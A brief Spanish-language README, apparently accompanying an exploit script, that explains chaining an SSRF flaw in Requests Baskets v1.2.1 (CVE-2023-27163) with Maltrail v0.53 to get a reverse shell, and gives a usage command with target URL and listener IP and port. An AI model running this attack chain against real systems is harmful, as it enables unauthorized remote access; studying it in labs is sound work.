
Requests Baskets (CVE-2023-27163) y Mailtrail v0.53
El siguiente exploit abusa de la vulnerabilidad SSRF de Requests Baskets v1.2.1 para reenviar la aplicación interna que se ejecuta en 127.0.0.1:80 a la aplicación externa en /pwned. Una vez que la aplicación Mailtrail v0.53 ha sido reenviada, se ejecutará un comando de reverse shell contra ella y, en pocos segundos, el usuario debería obtener una reverse shell en la máquina.
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT